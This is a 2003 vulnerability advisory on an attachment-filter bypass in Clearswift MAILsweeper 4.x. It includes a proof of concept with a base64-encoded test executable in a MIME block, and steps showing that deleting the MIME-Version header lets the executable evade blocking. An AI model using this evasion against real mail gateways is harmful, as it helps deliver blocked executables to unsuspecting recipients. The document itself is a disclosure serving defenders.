Reported March 3, 2003, by Martin O’Neal.

 

 

VERSIONS AFFECTED

 

  • Clearswift MAILsweeper 4.x for Windows NT/2000

 

DESCRIPTION

 

A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server. If a deliberately malformed MIME encapsulation technique is used, then the MAILsweeper product will not recognize the attachment and allows it to pass.

 

DEMONSTRATION

 

The discover posted the following steps as proof of concept:

 

-- Proof of concept --
 

For this proof of concept, the MIME encapsulation is simply modified to 
remove the MIME-Version header field. An example of an application that 
will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.
 

Whilst RFC2045 states that all agents must include this field \[2\] it 
then goes on to say that "In the absence of a MIME-Version field, a 
receiving mail user agent (whether conforming to MIME requirements or 
not) may optionally choose to interpret the body of the message 
according to local conventions."
 

Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.
 

Step 2: Now create a text file that will be used to hold the MIME 
encoded attachment. Start notepad (or another text editor), and paste 
in:
 

     MIME-Version: 1.0
     Content-Location:file:///executable.exe
     Content-Transfer-Encoding: base64
 

     TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
     /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
     gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
     C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
     YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
     Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
     h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
     oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
     2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
     ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
     29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     AAAAAAAAA=
 

Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition. 
 

Step 4: Reopen the attachment from step 2 and remove the first line 
(MIME-Version: 1.0), then resend the attachment as per step 3. This 
should result in the attachment not being spotted as an executable.

 

VENDOR RESPONSE

 

The vendor, Clearswift, has made an updated script utility available that can detect the malformed MIME header used in this vulnerability. As a workaround, this should be implemented until a fix or patch is available.

 

 

CREDIT          

Discovered by Martin O'Neal.